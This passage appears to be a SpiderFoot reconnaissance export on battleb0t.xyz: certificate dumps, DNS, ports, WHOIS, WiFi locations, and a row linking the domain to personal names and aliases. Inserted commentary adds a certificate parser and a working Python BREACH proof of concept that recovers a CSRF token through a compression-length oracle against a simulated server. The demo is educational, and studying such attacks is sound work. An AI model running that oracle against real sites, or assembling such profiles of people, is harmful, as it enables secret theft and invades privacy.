Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:23:04 2022 GMT
Not After : Feb 15 13:23:03 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:be:9b:e9:c6:04:01:1c:2c:7e:ac:66:f1:b1:7c:f0:ee:5e:
a7:7a:d6:c8:9e:79:b8:66:86:a3:c0:1f:2e:30:41:c8:ab:65:
cc:a9:76:5f:0c:9a:14:80:51:ed:a7:e9:7f:f2:bd:57:5c:9b:
04:31:55:52:cc:d9:5d:ee:2c:9b:e4:bf:d8:d9:92:19:14:10:
dd:51:d3:7f:4d:75:15:b6:a8:e3:fc:04:59:c4:b7:64:9f:51:
37:3d:db:dc:3f:62:ca:61:18:50:70:5c:05:5f:99:79:0d:a0:
0e:c8:35:8d:bb:f1:5e:79:d7:db:26:ea:af:a1:41:c0:38:87:
5a:1f:f0:8e:e8:e0:82:24:9f:5a:90:83:7a:4a:a7:ba:46:58:
13:f1:c7:56:f8:28:af:a1:60:8b:a6:cd:3c:87:94:ac:c7:fc:
20:7c:c8:b3:c3:76:a4:35:2d:72:c3:ee:ac:78:b8:e1:34:03:
38:a2:6a:44:20:aa:90:30:a3:3e:ab:ba:d0:59:e6:ec:06:0e:
8d:eb:87:b7:3c:38:30:f7:f2:e8:b8:2e:15:05:ad:78:2f:e8:
3c:50:44:89:a3:d8:8d:08:05:5d:7a:05:56:82:9c:5e:c3:16:
2a:39:5a:33:90:bb:6e:e6:f1:42:6a:27:46:25:76:11:a4:8f:
4f:1d:29:59
| battleb0t.xyz |
| 2023-05-12 03:10:09 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.108.0/24]
http://www.voipbl.org/update | 185.199.108.0/24 |
| 2023-05-12 02:53:19 | Internet Name | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | mail.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:33:10 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | vm.battleb0t.xyz | 45.131.109.53 |
| 2023-05-12 03:10:01 | Affiliate - Internet Name | No | DNS Resolver | 1 | 0 | 4 | 0 | None | expressdryclean.gr | 165.232.113.95 |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:8080 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | ChicoWLAN (Net ID: 00:0C:F6:4A:CA:EE) | 50.8897, 6.0563 |
| 2023-05-12 02:44:03 | Domain Name | No | SpiderFoot UI | 72 | 0 | 0 | 0 | None | battleb0t.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | {'webSearchUrl': u'https://www.google.com/search?q=site:www.ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://www.ayhu.xyz/']} |
| 2023-05-12 02:57:36 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 1 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | battleb0t.xyz |
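The CVE-2013-3587 description above is the one place on this page that explains a mechanism rather than listing a finding, so here is a worked illustration of it. The Python below is an added example, not part of the SpiderFoot or testssl.sh output and not code from the page: it simulates a server that gzip-compresses an HTML body containing both an anti-CSRF token and text reflected from the request, and recovers the token one character at a time from nothing but the compressed length. Everything in it is constructed for the demo: the token, the page template, the simulated server and the helper names are assumptions. Two simplifications keep the toy oracle exact: the compressor is pinned to zlib's static Huffman table (strategy `Z_FIXED`), so every literal and length code has a known bit size, and each probe is measured over eight bit alignments using 9-bit padding literals, which cancels the byte rounding that would otherwise hide a one-literal difference. A real server uses dynamic Huffman tables, which makes the same oracle noisier and is why the BREACH paper needs its two-tries trick and more requests. A scanner such as testssl.sh does not run the attack; it reports the precondition (HTTP compression on a TLS endpoint), which `breach_preconditions` mirrors.

```python
"""Length-oracle demo for CVE-2013-3587 (BREACH). Added example; all data is constructed."""
import zlib

HEX_ALPHABET = "0123456789abcdef"
SECRET_TOKEN = "a3f9c2e1d4b7"      # constructed secret; the recovery loop never reads it directly
REFLECT_PREFIX = 'csrf" value="'    # text that precedes the token in the page; assumed known


def compress_fixed(data: bytes) -> bytes:
    """DEFLATE with zlib's static Huffman table (strategy Z_FIXED, numeric value 4).

    With the static table every literal and length code has a known size, so the
    oracle below is exact.  Real servers use dynamic tables, which add noise that
    the attacker averages out with more requests; the principle is unchanged.
    """
    z = zlib.compressobj(9, zlib.DEFLATED, 15, 8, getattr(zlib, "Z_FIXED", 4))
    return z.compress(data) + z.flush()


def render_page(reflected: str, pad: bytes = b"") -> bytes:
    """Simulated vulnerable response: secret token and reflected input in one body."""
    html = (f'<html><form><input name="csrf" value="{SECRET_TOKEN}"></form>'
            f'<p>Results for: {reflected}</p></html>')
    return html.encode("ascii") + pad


def breach_preconditions(headers: dict, body: bytes, reflected: str) -> bool:
    """What a scanner reports as CVE-2013-3587 exposure: HTTP compression is enabled
    and request-controlled text appears in the (decompressed) response body."""
    encoding = {k.lower(): v for k, v in headers.items()}.get("content-encoding", "")
    return "gzip" in encoding.lower() and reflected.encode("ascii") in body


def oracle_size(reflected: str) -> int:
    """Compressed size summed over eight bit alignments.

    The pad bytes 0x90..0x97 are distinct, never match anything in the ASCII body,
    and are 9-bit literals in the static table, so each extra pad byte shifts the
    block by one bit modulo 8.  The sum of the eight byte-rounded sizes therefore
    equals the unpadded bit length plus a constant: one saved literal (8 bits) is
    always visible, even though a single measurement might round it away.
    """
    return sum(len(compress_fixed(render_page(reflected, bytes(range(0x90, 0x90 + k)))))
               for k in range(8))


def recover_token(length: int) -> str:
    """Guess the token one character at a time: the candidate that extends the LZ77
    back-reference into the secret is absorbed into the match instead of being
    emitted as a literal, so its response compresses smallest."""
    known = ""
    for _ in range(length):
        sizes = {c: oracle_size(REFLECT_PREFIX + known + c) for c in HEX_ALPHABET}
        known += min(sizes, key=sizes.get)
    return known


if __name__ == "__main__":
    print("preconditions met:",
          breach_preconditions({"Content-Encoding": "gzip"}, render_page("probe"), "probe"))
    print("recovered:", recover_token(len(SECRET_TOKEN)), "expected:", SECRET_TOKEN)
```

The fix the CVE implies is on the server side, not in TLS: do not compress responses that mix a secret with request-derived content, or make the secret change per request (masked CSRF tokens), or separate the secret from user input into a different response; rate limiting only slows the guessing loop down.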
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.185): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:8880 | 104.21.71.14 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=ZnKgqHhkfhEMG0RRLEy55qXrIGT89PCJPvhlAxU1THPzwDrL5gc7PkT%2B%2FxSKq2nR5SYE1oIsFspz8pOEUKsQOZN%2FSfuF%2FMxnliSNjDjXg8QSfRLZrnIM0lr2QA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f603759cec44a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:47:18 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
a4:32:cf:fb:d0:39:6f:82:9d:3d:67:37:3f:48:f2:83:df:47:
98:e5:77:f3:9a:cd:58:51:2e:5a:16:d2:ce:bc:15:65:21:f4:
b5:cd:b9:a9:fc:60:96:b4:37:b9:74:53:b0:08:d4:20:ed:ae:
46:30:5b:a1:40:1f:06:63:e8:b7:fd:a2:ae:46:43:12:c8:ec:
2c:fa:7e:4b:40:c3:e4:67:1b:d3:d7:35:70:63:9c:ea:59:e2:
5e:8f:9c:90:71:11:63:91:74:8d:0a:52:eb:ba:46:9f:f2:39:
5e:39:b2:09:76:41:0d:cb:d5:f3:3a:f2:81:99:14:13:be:9e:
11:ee:36:84:20:eb:dd:4f:6f:09:26:c0:62:74:10:aa:4d:74:
78:55:cd:0b:48:ce:19:77:6a:83:ea:d3:9f:49:7a:b9:c9:a9:
5b:95:9e:95:d8:54:4a:32:2e:c5:80:7d:32:ed:ad:ce:47:be:
97:bd:cb:d5:bd:1a:9f:ae:43:9a:14:6a:a0:5c:07:02:ab:55:
27:d1:6c:76:e5:b8:24:cd:b9:7c:e4:e2:4c:26:e7:40:31:8a:
19:ba:6f:75:c4:40:35:3a:93:76:52:b7:ca:0b:0f:f0:2a:8f:
ea:7f:1f:0f:0d:e6:80:25:29:5f:a8:34:cc:8b:fd:62:68:85:
22:2f:1a:a7
| battleb0t.xyz |
| 2023-05-12 02:54:18 | Linked URL - External | No | Web Spider | 8 | 0 | 3 | 0 | None | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:33:14 | Physical Location | No | ipstack | 0 | 0 | 3 | 0 | None | Germany | 45.131.109.53 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:8443 | 188.114.97.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ConnectionPoint (Net ID: 00:01:E3:4A:9F:48) | 52.3759, 4.8975 |
| 2023-05-12 02:54:56 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:d7:56:4b:39:cd:63:5b:72:07:1e:ba:15:c9:f7:2c:e7:33
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 04:50:12 2023 GMT
Not After : Jul 23 04:50:11 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:82:cb:77:ee:0a:02:15:cc:55:bf:00:98:6f:a8:
3f:b2:14:d4:9c:d2:64:fd:99:e1:d8:26:89:b8:f1:
dc:22:d0:26:9d:8e:a5:23:7c:46:6d:03:ff:6a:e6:
a2:08:ce:de:84:74:8f:ae:3e:dc:7e:26:40:72:7b:
57:ec:43:06:6a:71:6c:fc:31:f4:5e:75:d1:19:14:
5e:39:a9:c9:25:dc:c7:ab:fb:78:13:e9:b6:dd:4e:
22:f5:46:61:9b:4d:92:18:51:63:9f:47:d1:e0:56:
d2:dd:ee:e2:20:b3:7b:38:70:5e:c4:ce:34:85:6e:
20:54:d9:a0:fd:9c:5b:f3:2b:f0:71:40:e4:40:4b:
1e:0f:24:1b:6d:0c:b5:2f:db:ff:c9:99:df:c5:b7:
e3:7b:82:94:fd:3b:73:58:54:64:ee:2f:77:1b:b4:
c2:f6:38:26:30:8a:32:cc:d3:34:07:56:0c:a8:1d:
b3:55:51:77:90:73:0f:96:7f:80:56:ed:10:db:b0:
4f:75:85:22:ed:37:00:ed:d3:cd:b1:63:f5:f1:51:
be:1d:fc:12:12:48:53:55:50:e7:d9:8d:97:f2:49:
cd:d8:c7:68:76:42:1f:19:5e:47:61:6c:1c:99:ed:
d8:16:c4:32:36:77:d5:1b:79:9e:1e:4e:47:15:7c:
27:6f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:EC:9F:C5:4F:26:93:D3:4A:02:0B:79:BA:BB:F3:33:18:F7:3E:35
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Apr 24 05:50:12.941 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BE:39:54:A0:5F:1F:10:03:FA:09:8D:
D3:C7:7F:B5:EC:4B:30:F5:03:1A:D7:13:A5:C5:6A:89:
4C:4A:74:89:42:02:20:3C:6C:13:51:09:EB:20:0E:F2:
03:2C:A0:FE:54:7F:4D:57:F9:31:F5:F6:A8:0E:A0:F4:
B8:E3:3B:F1:51:CA:99
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Apr 24 05:50:12.949 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:96:8C:23:92:33:C0:50:69:A0:CE:CA:
6D:EC:41:72:0F:3A:22:55:7C:E8:C6:CE:65:0C:82:C6:
DB:89:9C:D5:92:02:20:1D:BC:82:99:B2:08:47:68:A7:
19:FE:0E:66:64:BD:7B:34:35:F5:43:E0:B0:AB:08:2C:
AC:E8:D7:78:E2:75:5B
Signature Algorithm: sha256WithRSAEncryption
75:8f:29:3b:d2:d8:ae:b2:42:be:ce:1d:92:6f:bf:ef:e4:4b:
a2:cc:9b:be:a2:6d:3e:79:03:58:39:62:e5:65:53:10:d9:48:
8b:b1:f6:05:b6:b7:52:53:28:4f:2a:d3:20:18:d0:2e:42:4c:
67:b2:a5:67:d1:32:90:9c:d4:e9:3e:c7:a3:6d:7e:19:cf:59:
bf:8e:eb:b2:ef:a8:35:56:cf:4d:12:32:f0:20:aa:e3:fa:5b:
67:0e:ad:7e:fd:aa:d9:0f:00:58:c4:8a:ff:28:e3:56:39:39:
d5:d5:6e:f4:82:09:ef:eb:ef:8d:10:bb:e4:fd:d3:df:7f:82:
4d:1e:9a:8e:07:b9:a2:ea:90:75:6d:88:35:45:32:5e:ef:d2:
88:82:4a:b0:57:e7:ca:c5:b0:4c:c5:d9:46:e9:84:e0:a2:96:
ca:c7:58:f8:26:23:6c:6a:c5:da:2f:19:ae:92:37:d6:01:ed:
da:39:aa:b3:fd:16:7a:3d:70:fe:30:a6:ba:a8:b4:33:13:8f:
50:9b:26:ec:34:68:cd:89:95:9d:6e:0f:b9:d7:5a:5c:dd:74:
3c:28:62:ab:d4:9a:31:85:d4:70:2a:24:9e:4b:82:ea:21:71:
d0:be:45:d1:a2:3f:85:e3:48:93:ac:6c:fe:38:a0:23:13:14:
9d:51:cb:62
| battleb0t.xyz |
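The three "SSL Certificate - Raw Data" rows above are openssl-style text dumps with their indentation flattened by the export. The Python below is an added example, not SpiderFoot code and not from the page, that parses that layout (and the normal indented `openssl x509 -text` form), pulls out the fields worth triaging from a Certificate Transparency hit (serial, issuer, subject CN, SANs, key size, whether the entry is a precertificate carrying the CT poison extension or an issued certificate carrying SCTs, and the validity window) and reports whether the certificate was still valid when the scan ran. Read against the rows above it would show that the first two entries (fluid and files, both precertificates) had already expired by the 2023-05-12 scan, while the third (oldfluid, the issued certificate with two SCTs) was still valid; stale CT entries like that often point at hosts that have since been retired or moved. The sample dump embedded in the code is constructed for the demo with invented names, serial and dates; the function and field names are mine.

```python
"""Triage parser for openssl-style certificate text dumps. Added example; sample data is constructed."""
import re
from datetime import datetime, timezone

# Constructed sample in the flattened layout of the table above (invented values).
SAMPLE_CT_DUMP = """Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:00:11:22:33:44:55:66:77:88:99:aa:bb:cc:dd:ee:ff:01
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan  2 19:07:11 2023 GMT
Not After : Apr  2 19:07:10 2023 GMT
Subject: CN=files.example.test
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Alternative Name:
DNS:files.example.test, DNS:www.files.example.test
CT Precertificate Poison: critical
NULL
"""

_TIME_FMT = "%b %d %H:%M:%S %Y GMT"


def _parse_time(s: str) -> datetime:
    # openssl pads single-digit days with a space ("Jan  2"); collapse whitespace first.
    return datetime.strptime(" ".join(s.split()), _TIME_FMT).replace(tzinfo=timezone.utc)


def parse_cert_text(text: str) -> dict:
    """Extract the fields worth triaging; tolerant of lost indentation."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    cert = {"serial": None, "issuer": None, "subject_cn": None, "not_before": None,
            "not_after": None, "sans": [], "key_bits": None, "precert": False,
            "sct_count": 0, "is_ca": False}
    for i, ln in enumerate(lines):
        nxt = lines[i + 1] if i + 1 < len(lines) else ""
        if ln.startswith("Serial Number:"):
            raw = ln[len("Serial Number:"):].strip() or nxt   # long serials sit on the next line
            if "(0x" in raw:                                   # short form: "1234 (0x4d2)"
                serial = raw.split("(0x", 1)[1].rstrip(")")
            else:
                serial = raw.split()[0].replace(":", "")
            cert["serial"] = serial.lower()
        elif ln.startswith("Issuer:"):
            cert["issuer"] = ln[len("Issuer:"):].strip()
        elif ln.startswith("Subject:"):
            m = re.search(r"CN\s*=\s*([^,]+)", ln)
            cert["subject_cn"] = m.group(1).strip() if m else None
        elif ln.startswith("Not Before:"):
            cert["not_before"] = _parse_time(ln.split(":", 1)[1])
        elif ln.startswith("Not After"):
            cert["not_after"] = _parse_time(ln.split(":", 1)[1])
        elif ln.startswith("X509v3 Subject Alternative Name:"):
            cert["sans"] = [p.strip()[4:] for p in nxt.split(",") if p.strip().startswith("DNS:")]
        elif "Public-Key: (" in ln:
            cert["key_bits"] = int(re.search(r"\((\d+) bit\)", ln).group(1))
        elif ln.startswith("CT Precertificate Poison"):
            cert["precert"] = True                             # logged precert, not the served cert
        elif ln.startswith("Signed Certificate Timestamp"):
            cert["sct_count"] += 1                             # issued cert with embedded SCTs
        elif ln.startswith("X509v3 Basic Constraints"):
            cert["is_ca"] = nxt.upper().startswith("CA:TRUE")
    return cert


def validity_status(cert: dict, when) -> str:
    """'valid', 'expired' or 'not yet valid' at `when` (ISO 8601 string or datetime)."""
    if isinstance(when, str):
        when = datetime.fromisoformat(when)
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    if when < cert["not_before"]:
        return "not yet valid"
    if when > cert["not_after"]:
        return "expired"
    return "valid"


if __name__ == "__main__":
    c = parse_cert_text(SAMPLE_CT_DUMP)
    print(c["subject_cn"], c["sans"], "precert" if c["precert"] else f"{c['sct_count']} SCTs",
          validity_status(c, "2023-05-12T02:47:18+00:00"))
```

A precertificate in CT proves only that issuance was requested and logged; whether the name is still served with that key is a question for the live endpoint, so expired or precert-only hits are leads for host enumeration, not evidence of a current deployment.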
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/random_6.PNG | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
